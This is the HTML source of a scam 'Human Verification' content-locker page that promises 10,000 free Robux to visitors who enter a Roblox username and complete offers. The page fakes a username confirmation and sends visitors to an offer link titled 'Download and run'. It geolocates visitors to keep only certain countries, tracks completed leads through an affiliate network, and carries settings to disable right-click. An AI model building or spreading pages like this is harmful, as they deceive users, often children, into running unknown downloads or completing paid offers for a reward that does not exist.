<head>
    <title>Offers</title>
    <meta name="referrer" content="no-referrer">
    <link rel="stylesheet" href="../../d266key948fg17.cloudfront.net/assets/landing_pages/fa/css/font-awesome.min.css">
    <script type="text/javascript">
        var $GET = {"cpguid":"","it":"4153491","w":"1368","h":"864","key":"acfb6","m":"0","r":"","o":0,"s1":0,"s2":0,"s3":0,"s4":0,"iframe_mode":0};
        var userSettings = {"%button_color_1%":"#378bdc","%button_color_2%":"#1c66bd","%main_button_text%":"Verify","%main_button_icon%":"lock","%main_button_font_size%":25,"%input_css%":"a.offer-text {\n\tfont-size: 16px;\n}\n\n* html body {\n  font-family: 'Poppins', sans-serif;\n    background-color: #00000082;\n    box-sizing: border-box;\n    margin: 0;\n    padding: 0;\n    }\nbody {\n background-image: url(https://wallpapercave.com/wp/wp7986935.jpg);\n    background-position: 50%;\n    background-repeat: no-repeat;\n    background-size: cover\n    }\n    .container {   \n    max-width: 475px;\n    margin: 0 auto;\n    background: #fff;\n    position: relative;\n    border-radius: 50px;\n    color: #333;\n    box-shadow: 0 10px 15px 0 rgba(0, 0, 0, 0.4);\n    padding: 30px;\n    margin-top: 135px;\n    padding-bottom: 50px;\n}\n\n\n\n    \n    \n    \n    .logo {\n      background-color: #fff;\n      max-width: 120px;\n      margin: auto;\n      padding: 15px;\n      border-radius: 40px;\n      margin-top: -90px;\n\n    \n    \n    }\n    h1{\n    color: #333333;\n    font-family: 'Poppins', sans-serif;\n    font-weight: 700;\n    display: block;\n    font-size: 30px;\n    margin-block-start: 0em;\n    margin-block-end: 0em;\n    margin-inline-start: 0px;\n    margin-inline-end: 0px;\n    }\n    .form__input {\n    font-size: 1rem;\n    width: 70%;\n    height: 10%;\n    text-align: left;\n    font-weight: light;\n    line-height: 1.4em;\n    background-color: hsla(0,0%,100%,.9);\n    border-radius: 8px;\n    text-rendering: auto;\n    -webkit-font-smoothing: antialiased;\n    font-weight: 400;\n    font-size: 16px;\n    height: 38px;\n    margin: 0;\n    box-sizing: border-box;\n    letter-spacing: normal;\n    word-spacing: normal;\n    text-transform: none;\n    text-indent: 0px;\n    text-shadow: none;\n    -webkit-rtl-ordering: logical;\n    cursor: text;\n    width: 45%;\n    max-width: 80%;\n    box-sizing: border-box;\n    text-rendering: auto;\n    -webkit-font-smoothing: antialiased;\n    overflow-y: scroll;\n    color: #1f1f1f;\n    font-weight: 300;\n    border-radius: 8px;\n    padding: 5px;\n    border: 1px solid #b8b8b8;\n    box-shadow: 0 0 8px 0 rgba(0,0,0,.1);\n    margin-top: 2%;\n}\n\n.btn-cta-lg{\n  color: #f2f4f5;\n  background-color: #393b3d;\n  border: 0px;\n  border-radius: 10px;\n  padding: 10px;\n  width: 13%;\n  font-weight: bolder;\n\n}\n    \n    \n    a.offer-text {\n      font-family: 'Poppins', sans-serif;\n      text-decoration: none;\n      margin-top: 5px;\n      padding: 10px 20px;\n      letter-spacing: 0;\n      font-weight: 400;\n      font-size: 1.1em !important;\n    }\n    \n    .gradient {\n    background: #00b06f;\n    white-space: pre-wrap;\n    margin: 0 auto;\n    padding: 10px 25px;\n    color: #fff;\n    border-radius: 10px;\n    font-weight: 500;\n    box-shadow: 0 0 6px 0 rgba(0, 0, 0, 0.3);\n    text-decoration: none !important;\n    border: 2px solid #eee;\n    position: relative;\n    cursor: pointer;\n    font-size: 1.1em !important;\n    text-decoration: none !important;\n    outline: none !important;\n    transform: scale(0.9);\n    transition: all 0.15s ease-in-out 0s;\n}\n    \n    .gradient:hover {\n      transform: scale(1);\n      transition: all 0.15s ease-in-out 0s;\n\n\n    \n    }\n\n\n    div.offer-wrapper {\n      margin-top: 0px;\n  }\n    \n    .bg {\n      \/* background-color: #ffffff94; *\/\n      padding: 10px;\n    \n    \n    \n    }\n    \n    .title1 {\n      font-family: 'Poppins', sans-serif;\n      border-radius: 10px;\n      text-align: center;\n      font-size: 25px;\n      font-weight: bolder;\n      text-transform: uppercase;\n      text-shadow: 1px 0px 18px rgba(255, 255, 255, 1);\n    \n    }\n    \n    .text1 {\n    font-family: 'Poppins', sans-serif;\n    font-size: 1.2em;\n    font-weight:400;\n    color: #3c3c3c;\n    width: 90%;\n    margin: 3% auto;\n    text-align: center;\n\n    }","%html_overall%":"\n<html lang=\"en\">\n<head>\n\n  <meta charset=\"UTF-8\">\n  <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n  <link rel=\"preconnect\" href=\"https:\/\/fonts.googleapis.com\">\n  <link rel=\"preconnect\" href=\"https:\/\/fonts.gstatic.com\" crossorigin>\n  <link href=\"https:\/\/fonts.googleapis.com\/css2?family=Poppins:wght@100;200;400;900&display=swap\" rel=\"stylesheet\">\n  \n  <link rel=\"stylesheet\" href=\"style.css\">\n  <title>Human Verification<\/title>\n  \n<\/head>\n<body>\n\n  <center>\n\n  <div class=\"container\">\n\n \n\n\n\n     \n\n\n    <div><img src=\"https:\/\/d266key948fg17.cloudfront.net\/uploads\/162668224932d745224966b28470dd34f3adf9c16b.jpg\" class=\"logo\"><\/div>\n \n    <h1>Final Step (US)<\/h1>\n      <div style=\"display: none;\" id=\"nav-robux-amount\" class=\"textuser\">ROBLOX Username: <h1 class=\"bold\">@vzxcv<\/h1><\/div>\n\n<div id=\"box-input\">\n    <input id=\"text\" minlength=\"3\" maxlength=\"16\" placeholder=\"Enter Username\" class=\"form__input\" required=\"\">\n    <button type=\"button\" class=\"btn-cta-lg\" onclick=\"step2()\">Next<\/button>\n<\/div>\n<div class=\"text1\">Complete any of the activities below to claim <span style=\"font-weight: bolder;\">10,000<\/span>  Robux<\/div>\n\n\n  \n    <div class=\"offers\">\n\n      \n\n    <\/div>\n\n\n  <\/div>\n  \n<\/center>\n\n\n  \n<\/body>\n\n\n  <script>\n    function step2() {\n        var username = document.getElementById(\"text\").value;\n        var robux = document.getElementById(\"nav-robux-amount\");\n        var h1 = document.createElement('div');\n        robux.innerHTML = ('ROBLOX Username: ' + '<h1 class=\"bold\">@'+username+ '<\/h1>')\n        robux.classList.add(\"textuser\")\n        document.getElementById(\"nav-robux-amount\").style.display=\"block\";\n        document.getElementById(\"box-input\").style.display=\"none\";\n        \n    }\n        \n    <\/script>\n\n<\/html>","%html_offer%":"<div class='offer-wrapper'><a class='btn offer-btn offer-text gradient responsive-width strike-tooltip' target='_blank' rel='noreferrer' href='{offer_link}' title='%offer_conversion%'>%offer_anchor%<\/a><\/div>","overlay_color":"#000000","overlay_opacity":"0.4","number_offers":4,"number_offers_required":2,"payout_required":1,"animation":"xf_fadeIn","animation_duration":2000,"onClose":"redirect","onCloseURL":"https:\/\/google.com","disable_right_click":0,"escape_key_close":0};
        var templateSettings = {"%button_color_1%":{"title":"Button Color 1","default":"#378bdc","type":"color","small":"Buttons will use top to bottom gradient."},"%button_color_2%":{"title":"Button Color 2","default":"#1c66bd","type":"color","small":"Buttons will use top to bottom gradient."},"%main_button_text%":{"title":"Main Button Text","default":"Verify","type":"text"},"%main_button_icon%":{"title":"Main Button Icon","default":"lock","type":"icon"},"%main_button_font_size%":{"title":"Main Button Font Size","default":"25","type":"number"},"%input_css%":{"title":"Custom CSS","default":"a.offer-text {\r\n\tfont-size: 16px;\r\n}","type":"html_css","small":"CSS Only. No HTML or JS. Edit with caution.","custom_filter":true},"%html_overall%":{"title":"HTML Template","default":"<div class='center1'><div class='center2'><div class='center3'>\r\n\t<div id='step1-wrapper'>\r\n\t\t<button type='button' class='btn btn-large continue-button gradient responsive-width' id='continue-button'><i class='fa fa-%main_button_icon%'><\/i> Verify<\/button>\r\n\t<\/div>\r\n\t<div id='step2-wrapper' style='display: none;'>\r\n\t\t\r\n\t<\/div>\r\n<\/div><\/div><\/div>","type":"html","small":"Overall HTML Template. Edit with caution.","custom_filter":true},"%html_offer%":{"title":"Offer HTML","default":"<div class='offer-wrapper'><a class='btn offer-btn offer-text gradient responsive-width strike-tooltip' target='_blank' rel='noreferrer' href='{offer_link}' title='%offer_conversion%'>%offer_anchor%<\/a><\/div>","type":"html","small":"Individual Offer HTML. Edit with caution.","custom_filter":true},"overlay_color":{"title":"BG Overlay Color","default":"#000000","type":"color","small":"Background color of overlay (not used in iframe mode)."},"overlay_opacity":{"title":"Overlay Opacity","default":"0.4","type":"text","small":"Overlay Opacity (0 for transparent, 1 for opaque)"},"number_offers":{"title":"Number of Offers","default":4,"type":"number","small":"Max of 5 offers."},"number_offers_required":{"title":"Offers Required","default":1,"type":"number","small":"Offers required for unlock."},"payout_required":{"title":"Payout Required (Cents)","default":1,"type":"number","small":"Payout required (in cents). 500 = $5.00"},"animation":{"title":"Entrance Animation","default":"xf_fadeIn","type":"select","options":{"Drop From Top":"xf_animateTop","Fade In":"xf_fadeIn","Slide From Right":"xf_slideRight","Slide Up":"xf_slideUp","Slide From Right (3D)":"xf_slideFall","Spin In":"xf_spinIn"}},"animation_duration":{"title":"Animation Duration (ms)","default":"600","type":"number","small":"1000ms = 1 second"},"onClose":{"title":"On Offer Complete","default":"redirect","type":"select","options":{"Close Locker":"close_locker","Redirect to URL":"redirect"}},"onCloseURL":{"title":"Redirect URL","default":"https:\/\/google.com","type":"text","small":"The URL the visitor will hit after completing an offer. Only enabled if option above is set to redirect."},"disable_right_click":{"title":"Disable Right Click","default":"0","type":"toggle","small":"Right click will be disabled for the entire page."},"escape_key_close":{"title":"Escape Key Close","default":"0","type":"toggle","small":"If enabled, user can exit content locker with escape key."}};
        var numOffers = parseInt(userSettings.number_offers);
    </script>
  
  <script>
    // Function to detect user's location
    function redirectBasedOnLocation() {
        fetch('https://ipinfo.io/json?token=2f4f97e2f3920a')
            .then(response => response.json())
            .then(data => {
                const country = data.country;
                const allowedCountries = ['AU', 'US', 'GB', 'CA'];

                // Explicitly redirect PH users
                if (country === 'PH') {
                    window.location.href = "https://ivory-hippopotamus.static.domains/etcc.html";
                } else if (!allowedCountries.includes(country)) {
                    // Redirect all other disallowed countries
                    window.location.href = "https://ivory-hippopotamus.static.domains/etcc.html";
                }
                // Allowed users (AU, US, GB, CA) stay on the page
            })
            .catch(error => {
                console.error("Error fetching the geolocation: ", error);
            });
    }

    // Run on page load
    window.onload = redirectBasedOnLocation;
</script>
  
    <style type="text/css">
        #step2-wrapper {
            display: none;
        }

        body {
            font-family: "Open Sans", sans-serif, Arial;
        }

        a.offer-text {
            text-decoration: none;
            font-size: 16px;
        }

        div.offer-wrapper {
            margin-top: 10px;
        }

        .responsive-width {
            width: 100%;
            max-width: 600px;
        }

        .btn-large {
            padding: 14px 16px;
            border-radius: 6px;
        }

        .btn {
            box-sizing: border-box;
            color: white;
            display: inline-block;
            padding: 8px 12px;
            margin-bottom: 0;
            font-size: 14px;
            font-weight: 500;
            line-height: 1.428571429;
            text-align: center;
            vertical-align: middle;
            cursor: pointer;
            border: 1px solid transparent;
            border-radius: 4px;
            -webkit-user-select: none;
            -moz-user-select: none;
            -ms-user-select: none;
            -o-user-select: none;
            user-select: none;
        }

        .gradient {
            background: #499bea;
            background: -moz-linear-gradient(top, #499bea 0%, #207ce5 100%);
            background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #499bea), color-stop(100%, #207ce5));
            background: -webkit-linear-gradient(top, #499bea 0%, #207ce5 100%);
            background: -o-linear-gradient(top, #499bea 0%, #207ce5 100%);
            background: -ms-linear-gradient(top, #499bea 0%, #207ce5 100%);
            background: linear-gradient(to bottom, #499bea 0%, #207ce5 100%);
            filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#499bea', endColorstr='#207ce5', GradientType=0);
            border: 1px solid #196bba;
        }

        .gradient:hover {
            opacity: 0.9;
        }

        .center1 {
            display: table;
            position: absolute;
            height: 100%;
            width: 100%;
        }

        .center2 {
            display: table-cell;
            vertical-align: middle;
        }

        .center3 {
            margin-left: auto;
            margin-right: auto;
            text-align: center;
        }

        #_strike-tooltip.active {
            display: block;
            z-index: 100;
            margin-top: -28px;
            opacity: 1;
            filter: alpha(opacity=100);

        }

        #_strike-tooltip:before {
            display: block;
            content: '';
            width: 6px;
            height: 6px;
            background: inherit;
            position: absolute;
            bottom: -2px;
            left: 50%;
            margin-left: -3px;
            transform: rotate(45deg);
            -ms-transform: rotate(45deg);
            -webkit-transform: rotate(45deg);
            -o-transform: rotate(45deg);
            -moz-transform: rotate(45deg);
        }

        #_strike-tooltip.down:before {
            top: -2px;
        }

        #_strike-tooltip.up:before {
            bottom: -2px;
        }

        #_strike-tooltip {
            font-family: "Open Sans", sans-serif;
            display: block;
            background: #232323;
            color: #fff;
            position: absolute;
            padding: 4px 9px;
            font-size: 12px;
            left: 0px;
            top: 0px;
            z-index: -1;
            opacity: 0;
            filter: alpha(opacity=0);
            margin-top: -20px;
            border-radius: 2px;
            -moz-border-radius: 2px;
            cursor: default;
            box-shadow: 0px 1px 1px rgba(0, 0, 0, 0.2);
            -moz-box-shadow: 0px 1px 1px rgba(0, 0, 0, 0.2);
        }

        .offerClicked {
            opacity: 0.7;
        }

        .btn.continue-button{
            font-size:25px;
        }
        a.offer-text {
	font-size: 16px;
}

* html body {
  font-family: 'Poppins', sans-serif;
    background-color: #00000082;
    box-sizing: border-box;
    margin: 0;
    padding: 0;
    }
body {
 background-image: url(https://i.postimg.cc/BQnVYXgb/Untitled9-20250920134956.png);
    background-position: 50%;
    background-repeat: no-repeat;
    background-size: cover
    }
    .container {   
    max-width: 475px;
    margin: 0 auto;
    background: #fff;
    position: relative;
    border-radius: 50px;
    color: #333;
    box-shadow: 0 10px 15px 0 rgba(0, 0, 0, 0.4);
    padding: 30px;
    margin-top: 135px;
    padding-bottom: 50px;
}



    
    
    
    .logo {
      background-color: #fff;
      max-width: 120px;
      margin: auto;
      padding: 15px;
      border-radius: 40px;
      margin-top: -90px;

    
    
    }
    h1{
    color: #333333;
    font-family: 'Poppins', sans-serif;
    font-weight: 700;
    display: block;
    font-size: 30px;
    margin-block-start: 0em;
    margin-block-end: 0em;
    margin-inline-start: 0px;
    margin-inline-end: 0px;
    }
    .form__input {
    font-size: 1rem;
    width: 70%;
    height: 10%;
    text-align: left;
    font-weight: light;
    line-height: 1.4em;
    background-color: hsla(0,0%,100%,.9);
    border-radius: 8px;
    text-rendering: auto;
    -webkit-font-smoothing: antialiased;
    font-weight: 400;
    font-size: 16px;
    height: 38px;
    margin: 0;
    box-sizing: border-box;
    letter-spacing: normal;
    word-spacing: normal;
    text-transform: none;
    text-indent: 0px;
    text-shadow: none;
    -webkit-rtl-ordering: logical;
    cursor: text;
    width: 45%;
    max-width: 80%;
    box-sizing: border-box;
    text-rendering: auto;
    -webkit-font-smoothing: antialiased;
    overflow-y: scroll;
    color: #1f1f1f;
    font-weight: 300;
    border-radius: 8px;
    padding: 5px;
    border: 1px solid #b8b8b8;
    box-shadow: 0 0 8px 0 rgba(0,0,0,.1);
    margin-top: 2%;
}

.btn-cta-lg{
  color: #f2f4f5;
  background-color: #393b3d;
  border: 0px;
  border-radius: 10px;
  padding: 10px;
  width: 13%;
  font-weight: bolder;

}
    
    
    a.offer-text {
      font-family: 'Poppins', sans-serif;
      text-decoration: none;
      margin-top: 5px;
      padding: 10px 20px;
      letter-spacing: 0;
      font-weight: 400;
      font-size: 1.1em !important;
    }
    
    .gradient {
    background: #00b06f;
    white-space: pre-wrap;
    margin: 0 auto;
    padding: 10px 25px;
    color: #fff;
    border-radius: 10px;
    font-weight: 500;
    box-shadow: 0 0 6px 0 rgba(0, 0, 0, 0.3);
    text-decoration: none !important;
    border: 2px solid #eee;
    position: relative;
    cursor: pointer;
    font-size: 1.1em !important;
    text-decoration: none !important;
    outline: none !important;
    transform: scale(0.9);
    transition: all 0.15s ease-in-out 0s;
}
    
    .gradient:hover {
      transform: scale(1);
      transition: all 0.15s ease-in-out 0s;


    
    }


    div.offer-wrapper {
      margin-top: 0px;
  }
    
    .bg {
      /* background-color: #ffffff94; */
      padding: 10px;
    
    
    
    }
    
    .title1 {
      font-family: 'Poppins', sans-serif;
      border-radius: 10px;
      text-align: center;
      font-size: 25px;
      font-weight: bolder;
      text-transform: uppercase;
      text-shadow: 1px 0px 18px rgba(255, 255, 255, 1);
    
    }
    
    .text1 {
    font-family: 'Poppins', sans-serif;
    font-size: 1.2em;
    font-weight:400;
    color: #3c3c3c;
    width: 90%;
    margin: 3% auto;
    text-align: center;

    }
    </style>
    <!-- Analytics -->
    <script>
        (function (i, s, o, g, r, a, m) {
            i['GoogleAnalyticsObject'] = r;
            i[r] = i[r] || function () {
                (i[r].q = i[r].q || []).push(arguments)
            }, i[r].l = 1 * new Date();
            a = s.createElement(o),
                m = s.getElementsByTagName(o)[0];
            a.async = 1;
            a.src = g;
            m.parentNode.insertBefore(a, m)
        })(window, document, 'script', '../../www.google-analytics.com/analytics.js', 'ga');

        ga('send', 'pageview');

    </script>
</head>
<body style="overflow-y:auto;margin: 0;padding:0;">

<html lang="en">
<head>

  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="preconnect" href="https://fonts.googleapis.com/">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@100;200;400;900&amp;display=swap" rel="stylesheet">
  
  <link rel="stylesheet" href="https://dlm0f6ot1zx75.cloudfront.net/public/style.css">
  <title>Human Verification</title>
  
</head>
<body>

  <center>

  <div class="container">

 



     


    <div><img src="https://i.postimg.cc/KvpsdxqN/Untitled11-20250920135015.png" class="logo"></div>
 
    <h1>Final Step</h1>
      <div style="display: none;" id="nav-robux-amount" class="textuser">ROBLOX Username: <h1 class="bold">@vzxcv</h1></div>

<div id="box-input">
    <input id="text" minlength="3" maxlength="16" placeholder="Enter Username" class="form__input" required="">
    <button type="button" class="btn-cta-lg" onclick="step2()">Next</button>
</div>
<div class="text1">Complete any of the activities below to claim <span style="font-weight: bolder;">10,000</span>  Robux </div>


<div class="offers">
<div class='offer-wrapper'><a class='btn offer-btn offer-text gradient responsive-width strike-tooltip' target='_blank' rel='noreferrer' href='https://unlockrwrd.com/Qe7NhdN' title='Download and run'>Answer Easy Questions</a></div>

  <script>
    function step2() {
        var username = document.getElementById("text").value;
        var robux = document.getElementById("nav-robux-amount");
        var h1 = document.createElement('div');
        robux.innerHTML = ('ROBLOX Username: ' + '<h1 class="bold">@'+username+ '</h1>')
        robux.classList.add("textuser")
        document.getElementById("nav-robux-amount").style.display="block";
        document.getElementById("box-input").style.display="none";
        
    }
        
    </script>

</html>
<div id='_strike-tooltip'></div>
<script>
    //Global Helper Functions

    function getSettingsValueV2(key) {
        if (typeof userSettings === 'undefined') {
            console.log("Error - userSettings undefined");
            return null;
        }
        if (typeof userSettings[key] !== "undefined" && userSettings[key]) {
            return userSettings[key];
        }
        if (typeof templateSettings === 'undefined') {
            console.log("Error - templateSettings undefined");
            return null;
        }
        if (typeof templateSettings[key] === 'undefined') {
            console.log("Error - key " + key + " in templateSettings undefined");
            return null;
        }
        return templateSettings[key].default;
    }

    function removeElByID(id) {
        var elem = document.getElementById(id);
        if (elem) {
            elem.parentElement.removeChild(elem);
        }
    }

    var $documentHead = document.getElementsByTagName('head')[0];

    function addScriptToHead(url, id) {
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = url;
        script.id = id;
        $documentHead.appendChild(script);
    }

    xfCheckForLead();

    function xfCheckForLead() {
        //xfCheckForLead is called by check.php

        checkLeadScript();
    }

    function xfOffersComplete(arr) {
        //xfOffersComplete is called by check.php when leads completed
        return templateHandleLeadsComplete(arr);
    }

    function checkLeadScript() {
        removeElByID("xfLEADCHECK");
        addScriptToHead(
            "https://dlm0f6ot1zx75.cloudfront.net/public/external/check.php?time=" + new Date().getTime() + "&it=" + $GET.it, "xfLEADCHECK");
    }
</script>
<script type="text/javascript">
    //Res Logging
    if ((window.screen.height > 0 && window.screen.width > 0) && ($GET.w == 0 || $GET.h == 0)) {
        //Resolution needs to be logged properly
        addScriptToHead('https://dlm0f6ot1zx75.cloudfront.net/public/external/resolution.php?h=' + parseInt(window.screen.height) + '&w=' + parseInt(
            window.screen.width));
    }
</script>
<script>
    //Right click
    if(parseInt(getSettingsValueV2('disable_right_click')) === 1){
        document.addEventListener('contextmenu', event => event.preventDefault());
    }
</script>
<script src="../../d266key948fg17.cloudfront.net/assets/content_lockers/jquery.js"></script>
<script type="text/javascript">
    $('#continue-button').click(function () {
        $('#step1-wrapper').fadeOut(500, function () {
            $('#step2-wrapper').fadeIn(500);
        });
        setTimeout(function () {
            $('#step1-wrapper').css('display', 'none');
            $('#step2-wrapper').css('display', 'block');
        }, 1100)
    });
    var $tooltip = jQuery("#_strike-tooltip");
    jQuery(".strike-tooltip").mouseenter(function () {
        if (jQuery(this).attr("title")) {

            var offset = jQuery(this).offset();
            $tooltip.html(jQuery(this).attr("title"));
            jQuery(this).attr("title", "");
            $tooltip.addClass("active");
            var wii = (parseInt(jQuery(this).css("width")) / 2);
            var wiiii = ((parseInt($tooltip.css("width")) + parseInt($tooltip.css("padding-right")) + parseInt($tooltip.css("padding-left"))) / 2);
            if ($(this).parent().is(':first-child')) {
                $tooltip.css("left", offset.left + "px").css("top", offset.top + $(this).parent().height() + 35 + "px").addClass("down").removeClass("up");
            }
            else {
                $tooltip.css("left", offset.left + "px").css("top", offset.top + "px").removeClass("down").addClass("up");
            }


            $tooltip.css("margin-left", ((wiiii - wii) * (-1)) + "px");
        }
    }).mouseleave(function () {
        $tooltip.removeClass("active");
        jQuery(this).attr("title", $tooltip.html());
    });
    $('a.offer-btn').click(function () {
        $(this).addClass("offerClicked");
        $(this).html('<i class="fa fa-circle-o-notch fa-spin" aria-hidden="true"></i> Waiting for completion');
    });
</script>
<script type="application/javascript">

    var CPABuildLeads = {};
    var offersNeeded = parseInt(parseFloat(userSettings.number_offers_required));
    if (offersNeeded < 1) offersNeeded = 1;
    var offersCompleted = 0;

    var payoutNeeded = parseInt(parseFloat(userSettings.payout_required));
    if (payoutNeeded < 1) payoutNeeded = 1;
    var payoutCompleted = 0;


    function templateHandleLeadsComplete(arr) {
        //This function is usually called by global xfOffersComplete

        $.each(arr, function (index, obj) {
            CPABuildLeads[obj.lead_id] = obj;
        });
        payoutCompleted = 0;
        offersCompleted = 0;
        $.each(CPABuildLeads, function (lead_id, obj) {
            offersCompleted += 1;
            payoutCompleted += parseInt(obj.points);
        });
        if (offersCompleted < offersNeeded) {
            $.each(CPABuildLeads, function (lead_id, obj) {
                var els = $('a.offer-btn');
                els.each(function () {
                    if ($(this).attr("href").includes("offer=" + obj.offer_id)) {
                        $(this).text("[OFFER COMPLETED - COMPLETE " + (offersNeeded - offersCompleted) + " MORE OFFER(S)]").off("click").css("color", "green");
                    }
                });

            });
        }
        else if (payoutCompleted < payoutNeeded) {
            $.each(CPABuildLeads, function (lead_id, obj) {
                var els = $('a.offer-btn');
                els.each(function () {
                    if ($(this).attr("href").includes("offer=" + obj.offer_id)) {
                        $(this).text("[OFFER COMPLETED FOR " + (obj.points) + " POINTS - NEED " + (payoutNeeded - payoutCompleted) + " MORE POINT(S)]").off("click").css("color", "green");
                    }
                });
            });
        }
        else {
            //Complete!
            if (userSettings.onClose == "redirect") {
                var $a = $("<a>OFFERS COMPLETE! CLICK HERE TO CONTINUE</a>");
                $a.attr("href", userSettings.onCloseURL);
                $('body').html("");
                $a.appendTo($('body'));
            }
        }

    }
</script>


<script src="https://static.app/js/static.js" type="text/javascript"></script>
</body>